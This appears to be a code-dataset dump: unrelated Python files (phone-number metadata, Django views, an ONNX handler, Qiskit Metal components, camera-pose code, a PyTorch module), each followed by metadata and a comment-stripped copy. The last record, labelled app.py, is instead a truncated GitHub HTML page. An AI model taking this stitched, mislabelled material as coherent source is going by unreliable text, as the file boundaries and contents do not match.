"""Auto-generated file, do not edit by hand. PH metadata""" from ..phonemetadata import NumberFormat, PhoneNumberDesc, PhoneMetadata PHONE_METADATA_PH = PhoneMetadata(id='PH', country_code=63, international_prefix='00', general_desc=PhoneNumberDesc(national_number_pattern='1800\\d{7,9}|(?:2|[89]\\d{4})\\d{5}|[2-8]\\d{8}|[28]\\d{7}', possible_length=(6, 8, 9, 10, 11, 12, 13), possible_length_local_only=(4, 5, 7)), fixed_line=PhoneNumberDesc(national_number_pattern='(?:(?:2[3-8]|3[2-68]|4[2-9]|5[2-6]|6[2-58]|7[24578])\\d{3}|88(?:22\\d\\d|42))\\d{4}|2\\d{5}(?:\\d{2})?|8[2-8]\\d{7}', example_number='21234567', possible_length=(6, 8, 9, 10), possible_length_local_only=(4, 5, 7)), mobile=PhoneNumberDesc(national_number_pattern='(?:8(?:1[37]|9[5-8])|9(?:0[5-9]|1[0-24-9]|[2357]\\d|4[2-9]|6[0-35-9]|8[189]|9[1-9]))\\d{7}', example_number='9051234567', possible_length=(10,)), toll_free=PhoneNumberDesc(national_number_pattern='1800\\d{7,9}', example_number='180012345678', possible_length=(11, 12, 13)), national_prefix='0', national_prefix_for_parsing='0', number_format=[NumberFormat(pattern='(\\d)(\\d{5})', format='\\1 \\2', leading_digits_pattern=['2'], national_prefix_formatting_rule='(0\\1)'), NumberFormat(pattern='(\\d)(\\d{3})(\\d{4})', format='\\1 \\2 \\3', leading_digits_pattern=['2'], national_prefix_formatting_rule='(0\\1)'), NumberFormat(pattern='(\\d{4})(\\d{4,6})', format='\\1 \\2', leading_digits_pattern=['3(?:23|39|46)|4(?:2[3-6]|[35]9|4[26]|76)|544|88[245]|(?:52|64|86)2', '3(?:230|397|461)|4(?:2(?:35|[46]4|51)|396|4(?:22|63)|59[347]|76[15])|5(?:221|446)|642[23]|8(?:622|8(?:[24]2|5[13]))'], national_prefix_formatting_rule='(0\\1)'), NumberFormat(pattern='(\\d{5})(\\d{4})', format='\\1 \\2', leading_digits_pattern=['346|4(?:27|9[35])|883', '3469|4(?:279|9(?:30|56))|8834'], national_prefix_formatting_rule='(0\\1)'), NumberFormat(pattern='(\\d)(\\d{4})(\\d{4})', format='\\1 \\2 \\3', leading_digits_pattern=['2'], national_prefix_formatting_rule='(0\\1)'), 
NumberFormat(pattern='(\\d{2})(\\d{3})(\\d{4})', format='\\1 \\2 \\3', leading_digits_pattern=['[3-7]|8[2-8]'], national_prefix_formatting_rule='(0\\1)'), NumberFormat(pattern='(\\d{3})(\\d{3})(\\d{4})', format='\\1 \\2 \\3', leading_digits_pattern=['[89]'], national_prefix_formatting_rule='0\\1'), NumberFormat(pattern='(\\d{4})(\\d{3})(\\d{4})', format='\\1 \\2 \\3', leading_digits_pattern=['1']), NumberFormat(pattern='(\\d{4})(\\d{1,2})(\\d{3})(\\d{4})', format='\\1 \\2 \\3 \\4', leading_digits_pattern=['1'])])
130.05
325
0.618608
from ..phonemetadata import NumberFormat, PhoneNumberDesc, PhoneMetadata PHONE_METADATA_PH = PhoneMetadata(id='PH', country_code=63, international_prefix='00', general_desc=PhoneNumberDesc(national_number_pattern='1800\\d{7,9}|(?:2|[89]\\d{4})\\d{5}|[2-8]\\d{8}|[28]\\d{7}', possible_length=(6, 8, 9, 10, 11, 12, 13), possible_length_local_only=(4, 5, 7)), fixed_line=PhoneNumberDesc(national_number_pattern='(?:(?:2[3-8]|3[2-68]|4[2-9]|5[2-6]|6[2-58]|7[24578])\\d{3}|88(?:22\\d\\d|42))\\d{4}|2\\d{5}(?:\\d{2})?|8[2-8]\\d{7}', example_number='21234567', possible_length=(6, 8, 9, 10), possible_length_local_only=(4, 5, 7)), mobile=PhoneNumberDesc(national_number_pattern='(?:8(?:1[37]|9[5-8])|9(?:0[5-9]|1[0-24-9]|[2357]\\d|4[2-9]|6[0-35-9]|8[189]|9[1-9]))\\d{7}', example_number='9051234567', possible_length=(10,)), toll_free=PhoneNumberDesc(national_number_pattern='1800\\d{7,9}', example_number='180012345678', possible_length=(11, 12, 13)), national_prefix='0', national_prefix_for_parsing='0', number_format=[NumberFormat(pattern='(\\d)(\\d{5})', format='\\1 \\2', leading_digits_pattern=['2'], national_prefix_formatting_rule='(0\\1)'), NumberFormat(pattern='(\\d)(\\d{3})(\\d{4})', format='\\1 \\2 \\3', leading_digits_pattern=['2'], national_prefix_formatting_rule='(0\\1)'), NumberFormat(pattern='(\\d{4})(\\d{4,6})', format='\\1 \\2', leading_digits_pattern=['3(?:23|39|46)|4(?:2[3-6]|[35]9|4[26]|76)|544|88[245]|(?:52|64|86)2', '3(?:230|397|461)|4(?:2(?:35|[46]4|51)|396|4(?:22|63)|59[347]|76[15])|5(?:221|446)|642[23]|8(?:622|8(?:[24]2|5[13]))'], national_prefix_formatting_rule='(0\\1)'), NumberFormat(pattern='(\\d{5})(\\d{4})', format='\\1 \\2', leading_digits_pattern=['346|4(?:27|9[35])|883', '3469|4(?:279|9(?:30|56))|8834'], national_prefix_formatting_rule='(0\\1)'), NumberFormat(pattern='(\\d)(\\d{4})(\\d{4})', format='\\1 \\2 \\3', leading_digits_pattern=['2'], national_prefix_formatting_rule='(0\\1)'), NumberFormat(pattern='(\\d{2})(\\d{3})(\\d{4})', format='\\1 \\2 \\3', 
leading_digits_pattern=['[3-7]|8[2-8]'], national_prefix_formatting_rule='(0\\1)'), NumberFormat(pattern='(\\d{3})(\\d{3})(\\d{4})', format='\\1 \\2 \\3', leading_digits_pattern=['[89]'], national_prefix_formatting_rule='0\\1'), NumberFormat(pattern='(\\d{4})(\\d{3})(\\d{4})', format='\\1 \\2 \\3', leading_digits_pattern=['1']), NumberFormat(pattern='(\\d{4})(\\d{1,2})(\\d{3})(\\d{4})', format='\\1 \\2 \\3 \\4', leading_digits_pattern=['1'])])
true
true
f705b5f35286918ebf4f6eb85dc49797c87f040f
2,375
py
Python
ch05/myproject_virtualenv/src/django-myproject/myproject/apps/example/views.py
PacktPublishing/Django-3-Web-Development-Cookbook
6ffe6e0add93a43a9abaff62e0147dc1f4f5351a
[ "MIT" ]
159
2019-11-13T14:11:39.000Z
2022-03-24T05:47:10.000Z
ch05/myproject_virtualenv/src/django-myproject/myproject/apps/example/views.py
PacktPublishing/Django-3-Web-Development-Cookbook
6ffe6e0add93a43a9abaff62e0147dc1f4f5351a
[ "MIT" ]
34
2019-11-06T08:32:48.000Z
2022-01-14T11:31:29.000Z
ch05/myproject_virtualenv/src/django-myproject/myproject/apps/example/views.py
PacktPublishing/Django-3-Web-Development-Cookbook
6ffe6e0add93a43a9abaff62e0147dc1f4f5351a
[ "MIT" ]
103
2019-08-15T21:35:26.000Z
2022-03-20T05:29:11.000Z
# -*- coding: UTF-8 -*- from __future__ import unicode_literals from datetime import timedelta from django.conf import settings from django.contrib.auth.decorators import login_required from django.shortcuts import render from django.utils.timezone import now as tz_now @login_required def start_page(request): # dummy view to illustrate all custom template filters and tags obj = { "created": tz_now() - timedelta(days=3), "content": f""" <p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.</p> <figure> <img src="{settings.STATIC_URL}site/img/logo.svg" alt="" /> <figcaption>Logo</figcaption> </figure> <p>Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Nemo enim ipsam voluptatem quia voluptas sit aspernatur aut odit aut fugit, sed quia consequuntur magni dolores eos qui ratione voluptatem sequi nesciunt. Neque porro quisquam est, qui dolorem ipsum quia dolor sit amet, consectetur, adipisci velit, sed quia non numquam eius modi tempora incidunt ut labore et dolore magnam aliquam quaerat voluptatem. Ut enim ad minima veniam, quis nostrum exercitationem ullam corporis suscipit laboriosam, nisi ut aliquid ex ea commodi consequatur? 
Quis autem vel eum iure reprehenderit qui in ea voluptate velit esse quam nihil molestiae consequatur, vel illum qui dolorem eum fugiat quo voluptas nulla pariatur?</p> """, "website": "https://docs.djangoproject.com/en/dev/howto/custom-template-tags/", "content_to_parse": u""" {% if request.user.is_authenticated %} Hello, {{ request.user.username }}! {% else %} Hello anonymous visitor! {% endif %} """, } return render(request, "index.html", { "object": obj, })
67.857143
880
0.722947
from __future__ import unicode_literals from datetime import timedelta from django.conf import settings from django.contrib.auth.decorators import login_required from django.shortcuts import render from django.utils.timezone import now as tz_now @login_required def start_page(request): obj = { "created": tz_now() - timedelta(days=3), "content": f""" <p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.</p> <figure> <img src="{settings.STATIC_URL}site/img/logo.svg" alt="" /> <figcaption>Logo</figcaption> </figure> <p>Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Nemo enim ipsam voluptatem quia voluptas sit aspernatur aut odit aut fugit, sed quia consequuntur magni dolores eos qui ratione voluptatem sequi nesciunt. Neque porro quisquam est, qui dolorem ipsum quia dolor sit amet, consectetur, adipisci velit, sed quia non numquam eius modi tempora incidunt ut labore et dolore magnam aliquam quaerat voluptatem. Ut enim ad minima veniam, quis nostrum exercitationem ullam corporis suscipit laboriosam, nisi ut aliquid ex ea commodi consequatur? Quis autem vel eum iure reprehenderit qui in ea voluptate velit esse quam nihil molestiae consequatur, vel illum qui dolorem eum fugiat quo voluptas nulla pariatur?</p> """, "website": "https://docs.djangoproject.com/en/dev/howto/custom-template-tags/", "content_to_parse": u""" {% if request.user.is_authenticated %} Hello, {{ request.user.username }}! 
{% else %} Hello anonymous visitor! {% endif %} """, } return render(request, "index.html", { "object": obj, })
true
true
f705b6a65b0a1a3cce1c1b27d5be5e9b86cb5570
2,458
py
Python
python/athena/onnx/handler.py
sj1104/Het
81b7e9f0f593108db969fc46a1af3df74b825230
[ "Apache-2.0" ]
2
2021-12-05T07:11:04.000Z
2021-12-15T07:53:48.000Z
python/athena/onnx/handler.py
sj1104/Het
81b7e9f0f593108db969fc46a1af3df74b825230
[ "Apache-2.0" ]
null
null
null
python/athena/onnx/handler.py
sj1104/Het
81b7e9f0f593108db969fc46a1af3df74b825230
[ "Apache-2.0" ]
3
2021-04-01T22:39:13.000Z
2021-04-21T11:51:57.000Z
# Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT license. from __future__ import absolute_import from __future__ import division from __future__ import print_function from __future__ import unicode_literals import collections import inspect from athena.onnx import constants class athena_op: _OPSETS = collections.OrderedDict() _MAPPING = None def __init__(self, name,onnx_op=None, domain=constants.ONNX_DOMAIN, **kwargs): if not isinstance(name, list): name = [name] self.name = name if not isinstance(onnx_op,list): onnx_op=[onnx_op]*len(name) self.onnx_op=onnx_op self.domain = domain self.kwargs = kwargs def __call__(self, func): opset = athena_op._OPSETS.get(self.domain) if not opset: opset = [] athena_op._OPSETS[self.domain] = opset for k, v in inspect.getmembers(func, inspect.ismethod): if k.startswith("version_"): version = int(k.replace("version_", "")) while version >= len(opset): opset.append({}) opset_dict = opset[version] for i,name in enumerate(self.name): opset_dict[name] = (v,self.onnx_op[i], self.kwargs) return func @staticmethod def get_opsets(): return athena_op._OPSETS @staticmethod def create_mapping(max_onnx_opset_version): mapping = {constants.ONNX_DOMAIN: max_onnx_opset_version} ops_mapping = {} for domain, opsets in athena_op.get_opsets().items(): for target_opset, op_map in enumerate(opsets): m = mapping.get(domain) if m: if target_opset <= m and op_map: ops_mapping.update(op_map) athena_op._MAPPING = ops_mapping return ops_mapping @staticmethod def find_effective_op(name): """Find the effective version of an op create_mapping. This is used if we need to compose ops from other ops where we'd need to find the op that is doing to be used in the final graph, for example there is a custom op that overrides a onnx op ... :param name: The operator name. """ map_info = athena_op._MAPPING.get(name) if map_info is None: return None return map_info
29.97561
92
0.6131
from __future__ import absolute_import from __future__ import division from __future__ import print_function from __future__ import unicode_literals import collections import inspect from athena.onnx import constants class athena_op: _OPSETS = collections.OrderedDict() _MAPPING = None def __init__(self, name,onnx_op=None, domain=constants.ONNX_DOMAIN, **kwargs): if not isinstance(name, list): name = [name] self.name = name if not isinstance(onnx_op,list): onnx_op=[onnx_op]*len(name) self.onnx_op=onnx_op self.domain = domain self.kwargs = kwargs def __call__(self, func): opset = athena_op._OPSETS.get(self.domain) if not opset: opset = [] athena_op._OPSETS[self.domain] = opset for k, v in inspect.getmembers(func, inspect.ismethod): if k.startswith("version_"): version = int(k.replace("version_", "")) while version >= len(opset): opset.append({}) opset_dict = opset[version] for i,name in enumerate(self.name): opset_dict[name] = (v,self.onnx_op[i], self.kwargs) return func @staticmethod def get_opsets(): return athena_op._OPSETS @staticmethod def create_mapping(max_onnx_opset_version): mapping = {constants.ONNX_DOMAIN: max_onnx_opset_version} ops_mapping = {} for domain, opsets in athena_op.get_opsets().items(): for target_opset, op_map in enumerate(opsets): m = mapping.get(domain) if m: if target_opset <= m and op_map: ops_mapping.update(op_map) athena_op._MAPPING = ops_mapping return ops_mapping @staticmethod def find_effective_op(name): map_info = athena_op._MAPPING.get(name) if map_info is None: return None return map_info
true
true
f705b7c9ba1ebdfedca5661e5e709e360e52da9e
4,993
py
Python
tutorials/resources/my429_qcomponents.py
TomVethaak/qiskit-metal
0fd3049b16a2b28dc6890b696d67329a91da70b9
[ "Apache-2.0" ]
167
2021-03-17T20:35:17.000Z
2022-03-31T13:25:04.000Z
tutorials/resources/my429_qcomponents.py
TomVethaak/qiskit-metal
0fd3049b16a2b28dc6890b696d67329a91da70b9
[ "Apache-2.0" ]
307
2021-03-17T14:07:43.000Z
2022-03-23T14:22:20.000Z
tutorials/resources/my429_qcomponents.py
TomVethaak/qiskit-metal
0fd3049b16a2b28dc6890b696d67329a91da70b9
[ "Apache-2.0" ]
122
2021-03-17T14:21:24.000Z
2022-03-18T10:09:38.000Z
# -*- coding: utf-8 -*- # This code is part of Qiskit. # # (C) Copyright IBM 2017, 2020. # # This code is licensed under the Apache License, Version 2.0. You may # obtain a copy of this license in the LICENSE.txt file in the root directory # of this source tree or at http://www.apache.org/licenses/LICENSE-2.0. # # Any modifications or derivative works of this code must retain this # copyright notice, and modified files need to carry a notice indicating # that they have been altered from the originals. from qiskit_metal import draw, Dict from qiskit_metal.qlibrary.core import QComponent class MyQComponent1(QComponent): """Demonstration1 - Straight segment with variable width/length""" ### def __init__() <- comes from QComponent ### Initiaizes base variables such as self.id, self.name and self.options ### Also launches the first execution of make() ### def rebuild() <- comes from QComponent ### Clear output from previous runs of make() (geom/pin/net) and re-runs it def make(self): """calculates the geometries of the QComponent""" rect = draw.rectangle(0.5, 0.1, 0, 0) #width, height, pos_x, pos_y # add_geometry() expects shapely, thus the use of drawn module above self.add_qgeometry('poly', {'my_polygon': rect}, layer=1, subtract=False) self.add_pin('in', rect.exterior.coords[:-3:-1], 0.1) #name, tangent, width class MyQComponent2(QComponent): """Demonstration2 - Straight segment with variable width/length""" # Your knobs to modify the cell behavior default_options = Dict(width='0.5mm', height='0.1mm', pos_x='0mm', pos_y='0mm', layer='1') """Default drawing options""" def make(self): """calculates the geometries of the QComponent""" p = self.parse_options( ) # short-handle alias for the options interpreter rect = draw.rectangle(p.width, p.height, p.pos_x, p.pos_y) self.add_qgeometry('poly', {'my_polygon': rect}, layer=p.layer, subtract=False) self.add_pin('in', rect.exterior.coords[:-3:-1], p.height) class MyQComponent3(QComponent): """Demonstration2 - Straight 
segment with variable width/length""" default_options = Dict(width='0.5mm', height='0.1mm', pos_x='0mm', pos_y='0mm', layer='1') """Default drawing options""" # Name prefix of component + import of renderer-specific default_options component_metadata = Dict( short_name='Trace', _qgeometry_table_path='False', #wirebonds _qgeometry_table_poly='True', _qgeometry_table_junction='False') #gds imports and analysis inputs """Component metadata""" def make(self): """calculates the geometries of the QComponent""" p = self.parse_options() # short-handle alias. Options interpreter rect = draw.rectangle(p.width, p.height, p.pos_x, p.pos_y) self.add_qgeometry('poly', {'my_polygon': rect}, layer=p.layer, subtract=False) self.add_pin('in', rect.exterior.coords[:-3:-1], p.height) class MyQComponent4(QComponent): """Demonstration3 - Straight segment with variable width/length""" default_options = Dict(width='0.5mm', height='0.1mm', gap='0.02mm', pos_x='0mm', pos_y='0mm', layer='1') """Default drawing options""" # Name prefix of component + import of renderer-specific default_options component_metadata = Dict( short_name='Trace', _qgeometry_table_path='True', #wirebonds _qgeometry_table_poly='False', _qgeometry_table_junction='False') #gds """Component metadata""" def make(self): """calculates the geometries of the QComponent""" p = self.parse_options() line = draw.LineString([(-p.width / 2, 0), (p.width / 2, 0)]) line = draw.translate(line, p.pos_x, p.pos_y) self.add_qgeometry('path', {'trace': line}, width=p.height, layer=p.layer, subtract=False) line2 = draw.LineString([((-p.width / 2) - 2 * p.gap, 0), ((p.width / 2) + 2 * p.gap, 0)]) line2 = draw.translate(line2, p.pos_x, p.pos_y) self.add_qgeometry('path', {'cut': line2}, width=p.height + 2 * p.gap, layer=p.layer, subtract=True) self.add_pin('in', line.coords[::-1], p.height, input_as_norm=True)
38.705426
81
0.567795
from qiskit_metal import draw, Dict from qiskit_metal.qlibrary.core import QComponent class MyQComponent1(QComponent): er='1') def make(self): p = self.parse_options( ) rect = draw.rectangle(p.width, p.height, p.pos_x, p.pos_y) self.add_qgeometry('poly', {'my_polygon': rect}, layer=p.layer, subtract=False) self.add_pin('in', rect.exterior.coords[:-3:-1], p.height) class MyQComponent3(QComponent): default_options = Dict(width='0.5mm', height='0.1mm', pos_x='0mm', pos_y='0mm', layer='1') component_metadata = Dict( short_name='Trace', _qgeometry_table_path='False', _qgeometry_table_poly='True', _qgeometry_table_junction='False') def make(self): p = self.parse_options() rect = draw.rectangle(p.width, p.height, p.pos_x, p.pos_y) self.add_qgeometry('poly', {'my_polygon': rect}, layer=p.layer, subtract=False) self.add_pin('in', rect.exterior.coords[:-3:-1], p.height) class MyQComponent4(QComponent): default_options = Dict(width='0.5mm', height='0.1mm', gap='0.02mm', pos_x='0mm', pos_y='0mm', layer='1') component_metadata = Dict( short_name='Trace', _qgeometry_table_path='True', _qgeometry_table_poly='False', _qgeometry_table_junction='False') def make(self): p = self.parse_options() line = draw.LineString([(-p.width / 2, 0), (p.width / 2, 0)]) line = draw.translate(line, p.pos_x, p.pos_y) self.add_qgeometry('path', {'trace': line}, width=p.height, layer=p.layer, subtract=False) line2 = draw.LineString([((-p.width / 2) - 2 * p.gap, 0), ((p.width / 2) + 2 * p.gap, 0)]) line2 = draw.translate(line2, p.pos_x, p.pos_y) self.add_qgeometry('path', {'cut': line2}, width=p.height + 2 * p.gap, layer=p.layer, subtract=True) self.add_pin('in', line.coords[::-1], p.height, input_as_norm=True)
true
true
f705b7eb5329fb67c4342d7f6f4f2089a9062d8f
1,324
py
Python
torchfes/colvar/fix.py
AkihideHayashi/torchfes1
83f01525e6071ffd7a884c8e108f9c25ba2b009b
[ "MIT" ]
null
null
null
torchfes/colvar/fix.py
AkihideHayashi/torchfes1
83f01525e6071ffd7a884c8e108f9c25ba2b009b
[ "MIT" ]
null
null
null
torchfes/colvar/fix.py
AkihideHayashi/torchfes1
83f01525e6071ffd7a884c8e108f9c25ba2b009b
[ "MIT" ]
null
null
null
import math from typing import Dict, Union, List import torch from torch import nn, Tensor from .. import properties as p def fix_msk(mol: Dict[str, Tensor], idx: Tensor): _, atm, dim = mol[p.pos].size() msk = torch.zeros([atm, dim], dtype=torch.bool, device=idx.device) msk[idx, :] = True return msk class Fix(nn.Module): idx: Tensor def __init__(self, idx: Union[Tensor, List[int]]): super().__init__() if isinstance(idx, list): idx = torch.tensor(idx) self.register_buffer('idx', idx) def forward(self, mol: Dict[str, Tensor]): out = mol.copy() msk = fix_msk(mol, self.idx)[None, :, :] if p.fix_msk not in out: out[p.fix_msk] = msk else: out[p.fix_msk] = out[p.fix_msk] | msk return out class FixGen(nn.Module): pbc: Tensor idx: Tensor def __init__(self, idx: Union[Tensor, List[int]], num_dim: int): super().__init__() if isinstance(idx, list): idx = torch.tensor(idx, dtype=torch.long) n = idx.numel() * num_dim self.register_buffer('idx', idx) self.register_buffer('pbc', torch.ones(n) * math.inf) def forward(self, mol: Dict[str, Tensor]): msk = fix_msk(mol, self.idx) return mol[p.pos][:, msk]
27.020408
70
0.586858
import math from typing import Dict, Union, List import torch from torch import nn, Tensor from .. import properties as p def fix_msk(mol: Dict[str, Tensor], idx: Tensor): _, atm, dim = mol[p.pos].size() msk = torch.zeros([atm, dim], dtype=torch.bool, device=idx.device) msk[idx, :] = True return msk class Fix(nn.Module): idx: Tensor def __init__(self, idx: Union[Tensor, List[int]]): super().__init__() if isinstance(idx, list): idx = torch.tensor(idx) self.register_buffer('idx', idx) def forward(self, mol: Dict[str, Tensor]): out = mol.copy() msk = fix_msk(mol, self.idx)[None, :, :] if p.fix_msk not in out: out[p.fix_msk] = msk else: out[p.fix_msk] = out[p.fix_msk] | msk return out class FixGen(nn.Module): pbc: Tensor idx: Tensor def __init__(self, idx: Union[Tensor, List[int]], num_dim: int): super().__init__() if isinstance(idx, list): idx = torch.tensor(idx, dtype=torch.long) n = idx.numel() * num_dim self.register_buffer('idx', idx) self.register_buffer('pbc', torch.ones(n) * math.inf) def forward(self, mol: Dict[str, Tensor]): msk = fix_msk(mol, self.idx) return mol[p.pos][:, msk]
true
true
f705b8a080b3d7d64d5acef4a26a5ac0ae6a0be5
675
py
Python
SfM/Traditional/ExtraCredit/ExtractCameraPose.py
akathpal/UMD-CMSC733-ComputerVision
f5fa21a0ada8ab8ea08a6c558f6df9676570a2df
[ "MIT" ]
1
2022-03-30T05:03:10.000Z
2022-03-30T05:03:10.000Z
SfM/Traditional/ExtraCredit/ExtractCameraPose.py
akathpal/UMD-CMSC733-ComputerVision
f5fa21a0ada8ab8ea08a6c558f6df9676570a2df
[ "MIT" ]
null
null
null
SfM/Traditional/ExtraCredit/ExtractCameraPose.py
akathpal/UMD-CMSC733-ComputerVision
f5fa21a0ada8ab8ea08a6c558f6df9676570a2df
[ "MIT" ]
1
2022-03-30T05:03:09.000Z
2022-03-30T05:03:09.000Z
import numpy as np import sys sys.dont_write_bytecode = True def ExtractCameraPose(E, K): U, S, V_T = np.linalg.svd(E) W = np.array([[0, -1, 0], [1, 0, 0], [0, 0, 1]]) # print("E svd U", U) # print("E svd S", S) # print("E svd U[:, 2]", U[:, 2]) R = [] C = [] R.append(np.dot(U, np.dot(W, V_T))) R.append(np.dot(U, np.dot(W, V_T))) R.append(np.dot(U, np.dot(W.T, V_T))) R.append(np.dot(U, np.dot(W.T, V_T))) C.append(U[:, 2]) C.append(-U[:, 2]) C.append(U[:, 2]) C.append(-U[:, 2]) for i in range(4): if (np.linalg.det(R[i]) < 0): R[i] = -R[i] C[i] = -C[i] return R, C
21.774194
52
0.463704
import numpy as np import sys sys.dont_write_bytecode = True def ExtractCameraPose(E, K): U, S, V_T = np.linalg.svd(E) W = np.array([[0, -1, 0], [1, 0, 0], [0, 0, 1]]) R = [] C = [] R.append(np.dot(U, np.dot(W, V_T))) R.append(np.dot(U, np.dot(W, V_T))) R.append(np.dot(U, np.dot(W.T, V_T))) R.append(np.dot(U, np.dot(W.T, V_T))) C.append(U[:, 2]) C.append(-U[:, 2]) C.append(U[:, 2]) C.append(-U[:, 2]) for i in range(4): if (np.linalg.det(R[i]) < 0): R[i] = -R[i] C[i] = -C[i] return R, C
true
true
f705b953a933a6e69681d0fcfe62b07584f75861
1,058
py
Python
app/user/views.py
frankRose1/recipe-app-api
0fff174ecb59bb06e6b631a33e34984e2f12f68a
[ "MIT" ]
null
null
null
app/user/views.py
frankRose1/recipe-app-api
0fff174ecb59bb06e6b631a33e34984e2f12f68a
[ "MIT" ]
null
null
null
app/user/views.py
frankRose1/recipe-app-api
0fff174ecb59bb06e6b631a33e34984e2f12f68a
[ "MIT" ]
null
null
null
from rest_framework import generics, authentication, permissions from rest_framework.authtoken.views import ObtainAuthToken from rest_framework.settings import api_settings from user.serializers import UserSerializer, AuthTokenSerializer class CreateUserView(generics.CreateAPIView): """Create a new user in the system""" serializer_class = UserSerializer class CreateTokenView(ObtainAuthToken): """Create a new token for a user""" serializer_class = AuthTokenSerializer renderer_classes = api_settings.DEFAULT_RENDERER_CLASSES class ManageUserView(generics.RetrieveUpdateAPIView): """Manage the authenticated user""" serializer_class = UserSerializer authentication_classes = (authentication.TokenAuthentication,) permission_classes = (permissions.IsAuthenticated,) def get_object(self): """Retrieve and return authenticated user""" # authentication_classes would have populated the request with the # authenticated user if they provided a valid token return self.request.user
35.266667
74
0.780718
from rest_framework import generics, authentication, permissions from rest_framework.authtoken.views import ObtainAuthToken from rest_framework.settings import api_settings from user.serializers import UserSerializer, AuthTokenSerializer class CreateUserView(generics.CreateAPIView): serializer_class = UserSerializer class CreateTokenView(ObtainAuthToken): serializer_class = AuthTokenSerializer renderer_classes = api_settings.DEFAULT_RENDERER_CLASSES class ManageUserView(generics.RetrieveUpdateAPIView): serializer_class = UserSerializer authentication_classes = (authentication.TokenAuthentication,) permission_classes = (permissions.IsAuthenticated,) def get_object(self): return self.request.user
true
true
f705b9da707722b21ab2a995b261c27870b2cf77
177,225
py
Python
app.py
Bomzz06/FDiscordA
e0be0bed91f843be1ab42564c8a774839ccaace0
[ "MIT" ]
null
null
null
app.py
Bomzz06/FDiscordA
e0be0bed91f843be1ab42564c8a774839ccaace0
[ "MIT" ]
null
null
null
app.py
Bomzz06/FDiscordA
e0be0bed91f843be1ab42564c8a774839ccaace0
[ "MIT" ]
null
null
null
<!DOCTYPE html> <html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark"> <head> <meta charset="utf-8"> <link rel="dns-prefetch" href="https://github.githubassets.com"> <link rel="dns-prefetch" href="https://avatars.githubusercontent.com"> <link rel="dns-prefetch" href="https://github-cloud.s3.amazonaws.com"> <link rel="dns-prefetch" href="https://user-images.githubusercontent.com/"> <link rel="preconnect" href="https://github.githubassets.com" crossorigin> <link rel="preconnect" href="https://avatars.githubusercontent.com"> <link crossorigin="anonymous" media="all" integrity="sha512-d4XC7S3D2O/G0TvZjbbtWpDgCLyqvsXCX4K0DUJVfSwpV8ySOlchU43C/9mcyyHtCnczq4eoCl/e3fzC9uXxGA==" rel="stylesheet" href="https://github.githubassets.com/assets/light-7785c2ed2dc3d8efc6d13bd98db6ed5a.css" /><link crossorigin="anonymous" media="all" integrity="sha512-uEgC6AoKK1gK/XX3HlE4+2pdmfa3CUGgk9GV+7h+h0dtALsvueFLg+18JnwLD1axmkp744IzWjFcfHZTxmQyMQ==" rel="stylesheet" href="https://github.githubassets.com/assets/dark-b84802e80a0a2b580afd75f71e5138fb.css" /><link data-color-theme="dark_dimmed" crossorigin="anonymous" media="all" integrity="sha512-KQFKp2zcS4QM9du72skcYxPfuDslYljsOd9hsZFHSQl7WnkzjR0KkkuMbY7KFRWTerb8KbAYy11eD2ZoFgVyJg==" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_dimmed-29014aa76cdc4b840cf5dbbbdac91c63.css" /><link data-color-theme="dark_high_contrast" crossorigin="anonymous" media="all" integrity="sha512-Bldh8KfOmuQXEarLeCx5IxrQms1DznU4qGbQ6oCrAVNdd4jea40lyBHdddi7o1P4dhler91XHyO9+iBe7m6LzQ==" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_high_contrast-065761f0a7ce9ae41711aacb782c7923.css" /><link data-color-theme="dark_protanopia" crossorigin="anonymous" media="all" integrity="sha512-ZTzLkJDxM5xDVGmjIyBfQBPzZ+qCtysiTQmLxFsZvozwCNcG4TgwuGWvSbKXxIGfD7rWNUt9kSyUyLxK1kMqhg==" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_protanopia-653ccb9090f1339c435469a323205f40.css" 
/><link data-color-theme="light_protanopia" crossorigin="anonymous" media="all" integrity="sha512-S9e8SuxweN/gYIfZR+mVTRvfJGkdNlTmZzokT1GZ9KoGEcUjgtWlvihTLVoG3E9gssDhT62eoq6UEeOFjFuvFA==" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_protanopia-4bd7bc4aec7078dfe06087d947e9954d.css" /> <link crossorigin="anonymous" media="all" integrity="sha512-+nVL2XvNtwumIdq12YtvhclBiE72DgFQr/ItWzUHymt6x2tCbYBg0DaLOy39bB+N4wmwNqQene1NORzhgfi/wQ==" rel="stylesheet" href="https://github.githubassets.com/assets/frameworks-fa754bd97bcdb70ba621dab5d98b6f85.css" /> <link crossorigin="anonymous" media="all" integrity="sha512-JhKolDx/FhHovKZsCFmQ2LKJwlyGRltUUDphBvVeSkv0Kl1vV4DpSpGXILf+CtiHubmHnqCOaBYpKb/rDjdAhQ==" rel="stylesheet" href="https://github.githubassets.com/assets/behaviors-2612a8943c7f1611e8bca66c085990d8.css" /> <link crossorigin="anonymous" media="all" integrity="sha512-/VP86KJoXAL8SaRo4I/QwqdgNg6xpeeb3JQ3gBKRLW76BBnBz3KCWJIKybR8px9wNNB6ixlzxDPAjkOSmRHODA==" rel="stylesheet" href="https://github.githubassets.com/assets/github-fd53fce8a2685c02fc49a468e08fd0c2.css" /> <script crossorigin="anonymous" defer="defer" 